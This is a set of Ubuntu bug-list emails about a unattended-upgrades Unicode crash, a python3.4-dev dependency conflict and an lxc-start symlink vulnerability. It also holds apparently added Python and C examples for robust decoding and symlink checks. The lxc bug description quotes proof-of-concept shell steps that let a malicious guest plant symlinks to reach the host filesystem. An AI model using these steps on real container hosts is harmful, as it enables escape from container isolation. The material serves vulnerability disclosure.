[Touch-packages] [Bug 1554365] Re: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128)

2017-03-28 Thread Daniel Kraft
This is the traceback from the logs in 16.04:

apt.systemd.daily[957]: Traceback (most recent call last):
apt.systemd.daily[957]:   File "/usr/bin/unattended-upgrade", line 1473, in 

apt.systemd.daily[957]: main(options)
apt.systemd.daily[957]:   File "/usr/bin/unattended-upgrade", line 1411, in main
apt.systemd.daily[957]: log_content = get_dpkg_log_content(logfile_dpkg, 
install_start_time)
apt.systemd.daily[957]:   File "/usr/bin/unattended-upgrade", line 1079, in 
get_dpkg_log_content
apt.systemd.daily[957]: for line in fp.readlines():
apt.systemd.daily[957]:   File "/usr/lib/python3.5/codecs.py", line 321, in 
decode
apt.systemd.daily[957]: (result, consumed) = self._buffer_decode(data, 
self.errors, final)
apt.systemd.daily[957]: UnicodeDecodeError: 'utf-8' codec can't decode byte 
0xfc in position 758: invalid start byte

Could it be that dpkg logs according to locale settings? These are the
ones on this host:

LANG=de_DE
LANGUAGE=de_DE:
LC_CTYPE=de_DE.UTF-8
LC_NUMERIC="de_DE"
LC_TIME="de_DE"
LC_COLLATE="de_DE"
LC_MONETARY="de_DE"
LC_MESSAGES="de_DE"
LC_PAPER="de_DE"
LC_NAME="de_DE"
LC_ADDRESS="de_DE"
LC_TELEPHONE="de_DE"
LC_MEASUREMENT="de_DE"
LC_IDENTIFICATION="de_DE"
LC_ALL=

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unattended-upgrades in
Ubuntu.
https://bugs.launchpad.net/bugs/1554365

Title:
  UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position
  2886: ordinal not in range(128)

Status in unattended-upgrades package in Ubuntu:
  New

Bug description:
  I got this in the mail:

  From: Cron Daemon 
  To: root@...
  Subject: Cron  test -x /usr/sbin/anacron || ( cd / && 
run-parts --report /etc/cron.daily )
  Date: Thu, 25 Feb 2016 02:11:47 +0200 (EET)

  /etc/cron.daily/apt:
  Traceback (most recent call last):
File "/usr/bin/unattended-upgrade", line 1255, in 
  main(options)
File "/usr/bin/unattended-upgrade", line 1205, in main
  pkgs, pkg_install_success, pkgs_kept_back, mem_log, logfile_dpkg)
File "/usr/bin/unattended-upgrade", line 752, in send_summary_mail
  body += fp.read()
File "/usr/lib/python3.4/encodings/ascii.py", line 26, in decode
  return codecs.ascii_decode(input, self.errors)[0]
  UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 
2886: ordinal not in range(128)

  According to /var/log/apt/history.log.1.gz, the packages upgraded that
  day were

  Start-Date: 2016-02-25  02:06:22
  Upgrade: libgnutls-openssl27:amd64 (2.12.23-12ubuntu2.4, 
2.12.23-12ubuntu2.5), libssl1.0.0:amd64 (1.0.1f-1ubuntu2.16, 
1.0.1f-1ubuntu2.17), libvirt0:amd64 (1.2.2-0ubuntu13.1.16, 
1.2.2-0ubuntu13.1.17), libssl-dev:amd64 (1.0.1f-1ubuntu2.16, 
1.0.1f-1ubuntu2.17), ca-certificates:amd64 (20141019ubuntu0.14.04.1, 
20160104ubuntu0.14.04.1), libgnutls26:amd64 (2.12.23-12ubuntu2.4, 
2.12.23-12ubuntu2.5), libssl-doc:amd64 (1.0.1f-1ubuntu2.16, 
1.0.1f-1ubuntu2.17), openssl:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17)
  End-Date: 2016-02-25  02:06:36

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: unattended-upgrades 0.82.1ubuntu2.4
  Uname: Linux 2.6.32-042stab108.8 x86_64
  ApportVersion: 2.14.1-0ubuntu3.19
  Architecture: amd64
  Date: Tue Mar  8 08:26:05 2016
  PackageArchitecture: all
  ProcEnviron:
   LC_CTYPE=lt_LT.UTF-8
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=lt_LT.UTF-8
   SHELL=/bin/bash
  SourcePackage: unattended-upgrades
  UpgradeStatus: Upgraded to trusty on 2016-02-06 (30 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/unattended-upgrades/+bug/1554365/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
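As an added example (my code, not code from unattended-upgrades or from anyone in this thread), the following Python shows why both tracebacks in this bug fail the same way and what a robust reader of dpkg output looks like. The log is opened in text mode, the codec comes from the locale (ASCII on the 14.04 reporter's host, UTF-8 on the 16.04 host above), and the first byte outside that codec (0xc3, 0xfc) aborts the whole run, so no summary is ever mailed. 0xfc is "ü" in ISO-8859-1, the default codeset of a de_DE locale without a ".UTF-8" suffix; 0xc3 is the first byte of most UTF-8-encoded Latin letters. The sample log lines, the function names and the version strings are constructed for the demonstration; POSTED_ENV is the locale environment copied from the message above. The last function is a heuristic for the question asked above: it flags categories whose codeset differs from LC_CTYPE's (where Python takes its default encoding from), since a process not started from that shell, such as a cron job or a systemd unit, may not see the LC_CTYPE override and would then run with the locale's default codeset.

```python
"""Reading dpkg output whose bytes may not match the codec Python chose from
the locale. Added example, not unattended-upgrades code."""
import io

# Constructed sample of dpkg's German output: "über" once as ISO-8859-1
# (what LANG=de_DE produces) and once as UTF-8. Versions are made up.
SAMPLE_LOG = (
    b"Vorbereitung zum Entpacken von .../libssl1.0.0_1.0.2g-1ubuntu4.6_amd64.deb ...\n"
    b"Entpacken von libssl1.0.0:amd64 (1.0.2g-1ubuntu4.6) \xfcber (1.0.2g-1ubuntu4.5) ...\n"
    b"Entpacken von openssl (1.0.2g-1ubuntu4.6) \xc3\xbcber (1.0.2g-1ubuntu4.5) ...\n"
    b"Richte libssl1.0.0:amd64 (1.0.2g-1ubuntu4.6) ein ...\n"
)

# Locale environment posted for the 16.04 host in this thread.
POSTED_ENV = {
    "LANG": "de_DE", "LANGUAGE": "de_DE:", "LC_CTYPE": "de_DE.UTF-8",
    "LC_NUMERIC": "de_DE", "LC_TIME": "de_DE", "LC_COLLATE": "de_DE",
    "LC_MONETARY": "de_DE", "LC_MESSAGES": "de_DE", "LC_PAPER": "de_DE",
    "LC_NAME": "de_DE", "LC_ADDRESS": "de_DE", "LC_TELEPHONE": "de_DE",
    "LC_MEASUREMENT": "de_DE", "LC_IDENTIFICATION": "de_DE", "LC_ALL": "",
}

LC_CATEGORIES = (
    "LC_NUMERIC", "LC_TIME", "LC_COLLATE", "LC_MONETARY", "LC_MESSAGES",
    "LC_PAPER", "LC_NAME", "LC_ADDRESS", "LC_TELEPHONE", "LC_MEASUREMENT",
    "LC_IDENTIFICATION",
)


def first_bad_byte(data, encoding):
    """Return (byte, offset) of the first byte `encoding` cannot decode, or
    None. This is the "byte 0xc3 in position 2886" pair from the traceback."""
    try:
        data.decode(encoding)
    except UnicodeDecodeError as exc:
        return data[exc.start], exc.start
    return None


def read_strict(data, encoding):
    """What unattended-upgrade does: a text-mode read with the locale codec
    and the default errors='strict'. One foreign byte raises and ends the run."""
    with io.TextIOWrapper(io.BytesIO(data), encoding=encoding) as fp:
        return fp.readlines()


def read_lenient(data, encoding="utf-8"):
    """Hardened read for text that is only displayed or mailed: an undecodable
    byte becomes U+FFFD instead of an exception, so the summary still goes out
    and the rest of the line survives for the reader."""
    with io.TextIOWrapper(io.BytesIO(data), encoding=encoding,
                          errors="replace") as fp:
        return fp.readlines()


def read_roundtrip(data):
    """Alternative when the bytes must be preserved (re-logged or handed to
    another tool): surrogateescape maps each bad byte to a lone surrogate, and
    encoding with the same handler gives the original bytes back."""
    with io.TextIOWrapper(io.BytesIO(data), encoding="utf-8",
                          errors="surrogateescape") as fp:
        return fp.readlines()


def _codeset(value):
    """'de_DE.UTF-8' -> 'UTF-8'; 'de_DE' -> '' (the locale's own default)."""
    if "." not in value:
        return ""
    return value.split(".", 1)[1].split("@", 1)[0].upper()


def locale_codeset_mismatches(env):
    """Categories whose codeset differs from LC_CTYPE's (Python's default
    encoding). An unset category falls back to LANG; a non-empty LC_ALL
    overrides everything, so nothing can mismatch then.
    Returns {category: codeset or 'default'}; empty means consistent."""
    if env.get("LC_ALL"):
        return {}
    ctype = _codeset(env.get("LC_CTYPE") or env.get("LANG", ""))
    out = {}
    for cat in LC_CATEGORIES:
        cs = _codeset(env.get(cat) or env.get("LANG", ""))
        if cs != ctype:
            out[cat] = cs or "default"
    return out
```

The same failure can be provoked at the shell: run the script with LANG=C (ASCII) and with LANG=de_DE.UTF-8 and compare what first_bad_byte reports; with errors='replace' neither setting can stop the summary mail.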


[Touch-packages] [Bug 1554365] Re: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128)

2017-03-28 Thread Daniel Kraft
This still exists in 16.04 and is hitting us every day.



[Touch-packages] [Bug 1503382] Re: unable to install python3.4 dev on fresh ubuntu cloud image

2015-10-07 Thread Daniel Kraft
Affects me too, but forced downgrading destroys python libraries it
seems:

virtualenv -p /usr/bin/python3 env
Running virtualenv with interpreter /usr/bin/python3
Using base prefix '/usr'
New python executable in env/bin/python3
Also creating executable in env/bin/python
Installing setuptools, pip...
  Complete output from command /home/user/jobs/env/bin/python3 -c "import sys, 
pip; sys...d\"] + sys.argv[1:]))" setuptools pip:
  Traceback (most recent call last):
  File "/usr/lib/python3.4/queue.py", line 4, in 
import threading
ImportError: No module named 'threading'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "", line 1, in 
  File 
"/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/__init__.py",
 line 9, in 
  File 
"/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/log.py", 
line 8, in 
  File 
"/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/backwardcompat/__init__.py",
 line 33, in 
  File "/usr/lib/python3.4/queue.py", line 6, in 
import dummy_threading as threading
  File "/usr/lib/python3.4/dummy_threading.py", line 45, in 
import threading
ImportError: No module named 'threading'

...Installing setuptools, pip...done.
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 2339, in 
main()
  File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 825, in main
symlink=options.symlink)
  File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 993, in 
create_environment
install_wheel(to_install, py_executable, search_dirs)
  File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 961, in 
install_wheel
'PIP_NO_INDEX': '1'
  File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 903, in 
call_subprocess
% (cmd_desc, proc.returncode))
OSError: Command /home/user/jobs/env/bin/python3 -c "import sys, pip; 
sys...d\"] + sys.argv[1:]))" setuptools pip failed with error code 1

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python3.4 in Ubuntu.
https://bugs.launchpad.net/bugs/1503382

Title:
  unable to install python3.4 dev on fresh ubuntu cloud image

Status in python3.4 package in Ubuntu:
  Confirmed

Bug description:
  Latest cloud ubuntu trusty image (06-Oct-2015 10:34)  https://cloud-
  images.ubuntu.com/trusty/current/

  apt-get update && apt-get upgrade # works fine

  # apt-get install python3.4-dev
  Reading package lists... Done
  Building dependency tree   
  Reading state information... Done
  Some packages could not be installed. This may mean that you have
  requested an impossible situation or if you are using the unstable
  distribution that some required packages have not yet been created
  or been moved out of Incoming.
  The following information may help to resolve the situation:

  The following packages have unmet dependencies:
   python3.4-dev : Depends: python3.4 (= 3.4.0-2ubuntu1.1) but 
3.4.3-1ubuntu1~14.04.1 is to be installed
   Depends: libpython3.4-dev (= 3.4.0-2ubuntu1.1) but it is not 
going to be installed
   Depends: libpython3.4 (= 3.4.0-2ubuntu1.1) but it is not 
going to be installed
  E: Unable to correct problems, you have held broken packages.

  # apt-get install libpython3.4-dev
  Reading package lists... Done
  Building dependency tree   
  Reading state information... Done
  Some packages could not be installed. This may mean that you have
  requested an impossible situation or if you are using the unstable
  distribution that some required packages have not yet been created
  or been moved out of Incoming.
  The following information may help to resolve the situation:

  The following packages have unmet dependencies:
   libpython3.4-dev : Depends: libpython3.4-stdlib (= 3.4.0-2ubuntu1.1) but 
3.4.3-1ubuntu1~14.04.1 is to be installed
  Depends: libpython3.4 (= 3.4.0-2ubuntu1.1) but it is not 
going to be installed
  E: Unable to correct problems, you have held broken packages.

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: python3.4-dev (not installed)
  ProcVersionSignature: Ubuntu 3.13.0-65.105-generic 3.13.11-ckt26
  Uname: Linux 3.13.0-65-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.15
  Architecture: amd64
  Date: Tue Oct  6 17:36:17 2015
  SourcePackage: python3.4
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1503382/+subscriptions



[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

2015-10-01 Thread Daniel Kraft
Regression fix fixes it on 14.04 LTS. Confirmed. Thanks!

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host
  filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory
  /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)

  It then modifies mounts operating in guest root directory before
  invoking init. As it does not check if all mount points are
  directories, a malicious guest may modify its internal structure
  before shutdown (or was created using manipulated image) and then when
  started again, guest may

  * Access the whole host root filesystem

  * Block switching from lxc-start apparmor profile to lxc-container-
  default

  
  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold

  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts

  
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc

  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr 
/usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status


  The issue was also found during
  https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions



[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

2015-09-30 Thread Daniel Kraft
@roman-fiedler
Might point to the same, but we already have relative mount targets:

  lxc.mount.entry = proc /var/lib/our_containers/123/rootfs/proc proc
nosuid,nodev,noexec 0 0

So that won't help as suggested in the mail.



[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

2015-09-30 Thread Daniel Kraft
@roman-fiedler
We're using absolute mount targets here, so that might help. Will try this out.



[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

2015-09-30 Thread Daniel Kraft
The problem lies in the ubuntu patch

http://archive.ubuntu.com/ubuntu/pool/main/l/lxc/lxc_1.0.7-0ubuntu0.5.debian.tar.gz

where this code

+   size_t start = croot ? strlen(croot) : 0;
+   if (strcmp(ws + start, target + start) != 0) {
+   ERROR("Mount onto %s resulted in %s\n", target, ws);
+   goto out;
+   }
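Review bot: the strcmp in `if (strcmp(ws + start, target + start) != 0)` compares the caller-supplied target byte for byte against the path the kernel reports back, so a target containing a doubled slash such as `/usr/lib/x86_64-linux-gnu/lxc//proc` (the value in the error message quoted further down in this message) can never equal the normalized `/usr/lib/x86_64-linux-gnu/lxc/proc`, and every container whose mount line is built that way is refused to start. Normalize target (collapse repeated slashes, drop a trailing slash) before the comparison, or compare the two paths by stat() identity (st_dev and st_ino) instead of string equality; and since `start` is taken from strlen(croot), croot needs the same normalization or the offset into both strings shifts.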

in file 0003-CVE-2015-1335.patch checks if ws and start are the same.
According to the given error (which I forgot to paste above), ws and target ARE 
different:

lxc-start: utils.c: ensure_not_symlink: 1384 Mount onto /usr/lib/x86_64
-linux-gnu/lxc//proc resulted in /usr/lib/x86_64-linux-gnu/lxc/proc

So target is

  /usr/lib/x86_64-linux-gnu/lxc//proc

and ws is

   /usr/lib/x86_64-linux-gnu/lxc/proc

Any hints how we could prevent the double slashing? Or would you just
"clean up" the path somehow?


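As an added example (my code, not lxc's and not the Ubuntu patch), the following C program shows both points raised in this thread: first, the comparison from the quoted hunk fails on `lxc//proc` versus `lxc/proc`, and normalizing both sides (collapsing repeated slashes and dropping a trailing slash) before the strcmp makes the configured target and the kernel-reported path agree again, with the croot offset handled as in the hunk; second, the check the bug description says was missing, walking every component of a guest-controlled mount path below the container root with lstat() and refusing any symlink. The function names (normalize_path, paths_match, no_symlink_below, demo_symlink_check), the scratch tree created under /tmp and the `/var/lib/c1/rootfs` paths are assumptions for the demonstration. lxc's production fix (safe_mount) takes a different route, mounting through an O_NOFOLLOW file descriptor, which this example does not reproduce.

```c
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Collapse runs of '/' and drop a trailing '/' (except for "/" itself):
 * ".../lxc//proc" becomes ".../lxc/proc". Returns 0, or -1 if out is too small. */
int normalize_path(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (in[i] == '/' && o > 0 && out[o - 1] == '/')
            continue;                       /* skip repeated slash */
        if (o + 1 >= outlen)
            return -1;
        out[o++] = in[i];
    }
    if (o > 1 && out[o - 1] == '/')
        o--;                                /* drop trailing slash */
    out[o] = '\0';
    return 0;
}

/* The comparison from the quoted hunk (ws + start vs. target + start, with
 * start = strlen(croot)), done on normalized strings so that a doubled slash
 * in the configured target no longer makes the check fail. Returns 1 on match. */
int paths_match(const char *ws, const char *target, const char *croot)
{
    char nws[PATH_MAX], ntarget[PATH_MAX], ncroot[PATH_MAX] = "";
    if (normalize_path(ws, nws, sizeof nws) < 0 ||
        normalize_path(target, ntarget, sizeof ntarget) < 0 ||
        (croot && normalize_path(croot, ncroot, sizeof ncroot) < 0))
        return 0;
    size_t start = strlen(ncroot);
    if (strlen(nws) < start || strlen(ntarget) < start)
        return 0;
    return strcmp(nws + start, ntarget + start) == 0;
}

/* The check the bug description says lxc-start lacked: each component of rel,
 * resolved below the trusted directory root, must be a real directory entry
 * and not a symlink. root is host-controlled and not inspected; rel is treated
 * as guest-controlled and ".." components are refused.
 * Returns 1 if no component is a symlink, 0 if one is, -1 on error. */
int no_symlink_below(const char *root, const char *rel)
{
    char joined[PATH_MAX], buf[PATH_MAX], nroot[PATH_MAX];
    struct stat st;
    if (snprintf(joined, sizeof joined, "%s/%s", root, rel) >= (int)sizeof joined)
        return -1;
    if (normalize_path(joined, buf, sizeof buf) < 0 ||
        normalize_path(root, nroot, sizeof nroot) < 0)
        return -1;
    size_t start = strlen(nroot), len = strlen(buf);
    if (strncmp(buf, nroot, start) != 0)
        return -1;
    size_t comp = (buf[start] == '/') ? start + 1 : start;  /* component start */
    for (size_t i = comp; i <= len; i++) {
        if (buf[i] != '/' && buf[i] != '\0')
            continue;
        if (i - comp == 2 && buf[comp] == '.' && buf[comp + 1] == '.')
            return -1;                      /* refuse traversal out of root */
        char saved = buf[i];
        buf[i] = '\0';                      /* lstat() the prefix up to here */
        if (lstat(buf, &st) < 0)
            return -1;
        buf[i] = saved;
        if (S_ISLNK(st.st_mode))
            return 0;
        comp = i + 1;
    }
    return 1;
}

/* Constructed scratch tree under /tmp (removed again): <base>/real/proc is a
 * genuine directory, <base>/fake -> real a symlink standing in for one a guest
 * planted in its rootfs. Returns 1 when the genuine path, spelled with the
 * doubled slash from the failing mount target in this thread, passes and the
 * symlinked one is rejected; 0 otherwise; -1 if the tree could not be built. */
int demo_symlink_check(void)
{
    char base[] = "/tmp/lxcchkXXXXXX", p[PATH_MAX];
    int result = -1;
    if (!mkdtemp(base))
        return -1;
    snprintf(p, sizeof p, "%s/real", base);
    if (mkdir(p, 0700) < 0) goto out;
    snprintf(p, sizeof p, "%s/real/proc", base);
    if (mkdir(p, 0700) < 0) goto out;
    snprintf(p, sizeof p, "%s/fake", base);
    if (symlink("real", p) < 0) goto out;
    result = no_symlink_below(base, "real//proc") == 1 &&
             no_symlink_below(base, "fake/proc") == 0;
out:
    snprintf(p, sizeof p, "%s/fake", base);      unlink(p);
    snprintf(p, sizeof p, "%s/real/proc", base); rmdir(p);
    snprintf(p, sizeof p, "%s/real", base);      rmdir(p);
    rmdir(base);
    return result;
}

int main(void)
{
    const char *ws = "/usr/lib/x86_64-linux-gnu/lxc/proc";
    const char *target = "/usr/lib/x86_64-linux-gnu/lxc//proc";
    printf("raw strcmp equal: %d\n", strcmp(ws, target) == 0);      /* 0 */
    printf("normalized match: %d\n", paths_match(ws, target, NULL)); /* 1 */
    printf("symlink demo ok:  %d\n", demo_symlink_check());         /* 1 */
    return 0;
}
```

Build with `cc -Wall -o lxcchk lxcchk.c` (file name assumed). Note that lstat()-walking a path is only meaningful if the guest cannot swap a component for a symlink between the check and the mount; the file-descriptor based approach lxc adopted closes that window, which is why it is preferable in the real code path.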

[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

2015-09-30 Thread Daniel Kraft
We're getting

lxc-start: utils.c: safe_mount: 1409 Mount of 'proc' onto
'/usr/lib/x86_64-linux-gnu/lxc//proc' was onto a symlink!

on all containers since we upgraded to 1.0.7-0ubuntu0.5 and they don't
start. No container has /proc as a symlink. Please tell me what
information is required from me.

We downgraded to 1.0.6-0ubuntu0.1 which works.
